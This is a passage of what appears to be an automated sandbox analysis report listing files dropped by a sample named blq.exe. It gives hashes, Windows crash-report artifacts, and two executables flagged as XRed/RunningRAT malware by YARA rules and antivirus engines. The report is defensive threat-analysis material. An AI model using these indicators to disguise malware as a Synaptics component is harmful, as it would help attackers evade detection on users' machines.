                                                                                        SHA-256:9C087166F83F8958B237BC9C8B8B95172D7B8A663D3AD384681231D588A6C278
                                                                                        SHA-512:3B9FAC6A787275CFA8AF9631E9BAEDB9A181817B478F08EB3E982F71F9DF3453B2D1C36CCA57D649D041C788235F655B5F374BD96E496A72E33E2A8A9FB93F09
                                                                                        Malicious:false
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.5.4.8.3.6.0.8.0.7.2.6.1.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.5.4.8.3.8.5.1.1.9.7.6.7.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.4.e.f.b.2.d.7.-.f.f.b.f.-.4.2.0.7.-.a.d.c.b.-.3.5.3.f.e.e.3.c.a.c.9.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.f.e.8.1.e.e.7.-.4.8.d.d.-.4.8.9.1.-.9.3.7.a.-.2.e.2.9.f.8.a.f.a.2.9.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.d.c.-.0.0.0.1.-.0.0.1.4.-.a.f.f.d.-.f.8.5.4.4.8.5.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.f.2.4.c.7.6.9.4.e.6.c.f.1.7.6.3.c.1.a.9.8.b.d.1.a.2.7.1.5.2.b.e.d.1.e.b.f.f.8.2.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER255C.tmp.WERInternalMetadata.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):6322
                                                                                        Entropy (8bit):3.7218065466196264
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJExa6GBCYiStl5QtprO89bdfsfg/m:R6lXJ16lYll5Q3dEfF
                                                                                        MD5:6FD49605B64A1832E9ABF598E85A3F85
                                                                                        SHA1:785B80BA20949EED69304B62092A1F455C1CB4E3
                                                                                        SHA-256:A0670F32602E0D2563A15C616496CE6346A5E60BC41B69D52E4008118DC7CB7E
                                                                                        SHA-512:1230BFCE3144F2C2E9A02D1FB8BEB1AD0D2DE8D9CB6BD7798227095A81730500F7F520510D9443FC7EFAC34226BDB3993AFAB8F52DE0DF9473A7C3B41F4EBC2E
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.4.4.<./.P.i.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER257D.tmp.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4572
                                                                                        Entropy (8bit):4.448440392778124
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsZtJg77aI9S9xu9CWpW8VYFYm8M4JF6EFT+q842+n75bZ4d:uIjfZHI7A87VBJgyU+n75bZ4d
                                                                                        MD5:9B0442AEA4BC6A1B417A0848B03D68C8
                                                                                        SHA1:23E0609F7D624A90EECF7735485807679C6F5BA2
                                                                                        SHA-256:324EDA7E8737AF119D1839CF6A30F81A7EE417448EC0AD29A0F448A183D23791
                                                                                        SHA-512:AB81FD2AEBA115C6E71E921672E40AF051B0D3FE51B036961149E5DCC54151F407DFD6A3F6A658582673FA39590CC21951994E348E7FC0C577D333AC067912E3
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="645855" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER259A.tmp.csv

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):89278
                                                                                        Entropy (8bit):3.1104531659980235
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:z4OyZ5V17Arrb/IdyQat5EWRLEZ/ger2q:z4OyZ5V17Arrb/IdyQabEWRLEZ/ger2q
                                                                                        MD5:304C4B08E508F07496984AC2E361E380
                                                                                        SHA1:DAF545B00D4F2A1198BDC25712DD50EE17685594
                                                                                        SHA-256:B28942754F75DDE51B3E73FA504B2201EEC5D8B4FD33DD5FCA471757ED196122
                                                                                        SHA-512:17422355B5A028FA0ED9901BF72FE144885BA34417BC29A72F61E51D64F0B61F8A35CEB8F9DBDBA54A8051920330C0049A62231342432EB7B6133E87DCB07DD1
                                                                                        Malicious:false
                                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER25F9.tmp.txt

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):13340
                                                                                        Entropy (8bit):2.6871470090051806
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:TiZYWocXoZYFYEcWZSHQYEZtttKikIbdFwarDnqajmtM/8HIE03:2ZDYS7ThlGajmtM/8oE03
                                                                                        MD5:109A975338FC1D5C05A6F471318F927C
                                                                                        SHA1:39BDB0DEAD36A926F78BB6E7A268561BD439FED8
                                                                                        SHA-256:E17559EE469F12C4883B2EB3BB33FE3C0F5A1990EDC505C4A7A11B9F8B5BA448
                                                                                        SHA-512:BF9BC7B3E5DB3AC1BA53D44E76AF01F949BDFCDF8AE92EE375BE6E57F6152FE50D6615329566A98F000E9CDA5D7D4889A0D6A78D26CA25A6869BEE70B7A5040A
                                                                                        Malicious:false
                                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER39ED.tmp.dmp

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Tue Dec 24 21:12:49 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):7885078
                                                                                        Entropy (8bit):2.0982081327119086
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:U/dBMeX6AojnIcG/Bdc0LhnyxOiE7px0XbVC:0jMeX6Jjb8Bdc0L5yxOiE7p6BC
                                                                                        MD5:D6CFA0B529547C4AA2B67A82B8D0C572
                                                                                        SHA1:1991EA417CCE1B4FCE9C0ED417DD927F91EDA379
                                                                                        SHA-256:FC36FE06881D5EBDA012A5413728574E5B8C7468088CF8AF1F6C3F3FE8CDC148
                                                                                        SHA-512:94A17352B216D10BE018BD14B34CCFCD63E1E1D8AC357BA7DB92FA85AC70B67B4E9F2905C1CDAF5D037C07CCE78C58F4CF3E2E7730AFE7BAD80DEAEDF23B0BA6
                                                                                        Malicious:false
                                                                                        Preview:MDMP..a..... ........#kg.............{.....................$...........4Z..............`.......8...........T............t..F.u.....................................................................................................eJ......(.......GenuineIntel............T...........d#kg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER97DD.tmp.WERInternalMetadata.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):6322
                                                                                        Entropy (8bit):3.7174391866795453
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJExN6INZCYirJkfbpD089b2fsfYSm:R6lXJq6INMYGJkX2Ef8
                                                                                        MD5:27AF5816E9E5D5FEA18327D1F4D65DFA
                                                                                        SHA1:98A0067DEE7D899727C8D0C38D541BABF423DF3A
                                                                                        SHA-256:555F1C13BC1C4897A2F0901416299F2C0F38418F6D2926557D5EB7C2A9F065CC
                                                                                        SHA-512:DAB97C0993736BB0828A9C2B6757D4F62921ACCD527888FFE799F0DDD8240723D821C560BE34497144528689C228C164BEE76520A619852C534B2274CF622F10
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.4.4.<./.P.i.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER980D.tmp.xml

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4580
                                                                                        Entropy (8bit):4.4468103602131075
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsZtJg77aI9S9xu9CWpW8VYpYm8M4JFFF4+q8Zin75bZ4d:uIjfZHI7A87VJJiJn75bZ4d
                                                                                        MD5:0DD8F536B0C74D8D2222FA07869BEB18
                                                                                        SHA1:0C386D5F72A9CF9995261AF292FED0EA836C63BC
                                                                                        SHA-256:30F9613CF410F82112A8550141339B939B70B743648A8947550FA83FE2AFCA54
                                                                                        SHA-512:922476C911D112CE52605CC76AF6778FEF5588E63BD5E9DAA1668FBC3A55DD09660D45008AB7C7C8EF72B3F3AC18C8A63A933EDF6BFEF2796641004A134BE23C
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="645855" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER981C.tmp.csv

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):89370
                                                                                        Entropy (8bit):3.110912936468549
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:a1Ury9iBGkkW0WgjiIq3n85EWRLEZ/gt6WGI:a1Ury9iBGkkW0WgjiIq3nwEWRLEZ/gt/
                                                                                        MD5:0A7227CB919E375CF29D1F71B7A07922
                                                                                        SHA1:62ABAA370286C6852F227A249589629D5C862BC5
                                                                                        SHA-256:68E567AD786AC8BBBA78014E8A7344BB9947A562926E2E57B5EAA24FDADAB2A4
                                                                                        SHA-512:AF2D7E500E96790FC6246C2FCAEE3A77E75513F9C422426E3A1B9AF72E4A16D22AFA319536F1535C1FE7168AC53BD5888C3FC4C113926CCB87B24C0DEC6D668F
                                                                                        Malicious:false
                                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER988B.tmp.txt

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):13340
                                                                                        Entropy (8bit):2.6871392433520946
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:TiZYW0etxMth2LYvYxW0HQYEZbGtNikI1dxwe8b/aVmWMktonII03:2ZD0eqqoN1aaVmWMktoII03
                                                                                        MD5:BC1BDE813DF5263CE026E7AF6D5BE38A
                                                                                        SHA1:CBF77AAE65108EF8E45ED380585CA16548DE1559
                                                                                        SHA-256:C2F75CD8DC843C23C830698E4FC3626E94EFC1A8C1EF46FB8042716CBF1FFF05
                                                                                        SHA-512:39A7DCFCF109A69CB70B2067D3C23C041F2E22D330F2AE034CEE494639B43130844E55C89B638E0D1723EDA78CBB8AE95C189F6867A2D207164964803779CF7B
                                                                                        Malicious:false
                                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD85.tmp.dmp

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Tue Dec 24 21:12:24 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):6832308
                                                                                        Entropy (8bit):2.195506302364893
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:zmcz3LyMeX6KMNPI0w/JdN03JkVzTiE7pI17DR:DzuMeX6PNDGJdN03SVzTiE7pQF
                                                                                        MD5:95D25469F49DBD8CD9A8D4B33F800CAE
                                                                                        SHA1:47F041E0B985A083A2E072E59A5C3D5D4C3C2F0C
                                                                                        SHA-256:58F9E0E115F8B5A8799E3D9BB5C747A4ED4DA0F1A1E9507742006AFD06E63F8A
                                                                                        SHA-512:33229D8A6374FA18FE8274C46094A23CFF81F0503384D7251B5C18F96CDB03CD85AD496D1125962389148B4E4A8AE4323E8B80FDB604E04E2BDE0A91A7BE41C3
                                                                                        Malicious:false
                                                                                        Preview:MDMP..a..... ........#kg.............{......................$...P........Y..............`.......8...........T...........Xt..\.e.........t...........`...............................................................................eJ..............GenuineIntel............T...........d#kg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Synaptics\RCXAFD2.tmp

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\blq.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:modified
                                                                                        Size (bytes):771584
                                                                                        Entropy (8bit):6.622826360248542
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9I5r:ansJ39LyjbJkQFMhmC+6GD9G
                                                                                        MD5:64C0A5B375F1AB0C44808320D5AF9E84
                                                                                        SHA1:F24C7694E6CF1763C1A98BD1A27152BED1EBFF82
                                                                                        SHA-256:05B222D35057310611697B4D0EE99656F9956BD421785AEDFA3B928000F07801
                                                                                        SHA-512:2353837EB7A446CEF1863C1488204619716F4BEB14371FBC9F1D6A07D3336452F7DA8E6A078C4335EA2086494F292908C7DCA5C8A7F1A371CD9DC14F997EC217
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCXAFD2.tmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCXAFD2.tmp, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 100%
                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                        C:\ProgramData\Synaptics\Synaptics.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\blq.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):820736
                                                                                        Entropy (8bit):6.5618190433891295
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:GMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9zl6MMuj:GnsJ39LyjbJkQFMhmC+6GD99h
                                                                                        MD5:6153A06B74491BACB664BF142B598C69
                                                                                        SHA1:DADE36A11A568E3B0B5F3E7FD44B566182702534
                                                                                        SHA-256:0B510380E52B3C97E7A2F227EB9ECDA6A194885DA74FAC6630F1EB7D5EE6091F
                                                                                        SHA-512:BB1C20CE4B2AE5E3524E1127ECA6047AB897DA49D8B66E435E8D81F418DC16C7C6345887AE67C9CA7EA0F39D175EEDACE8DABC74BE9DB9EA492CA4C489EC4721
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                        • Rule: MALWARE_Win_RunningRAT, Description: Detects RunningRAT, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: ditekSHen
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 92%
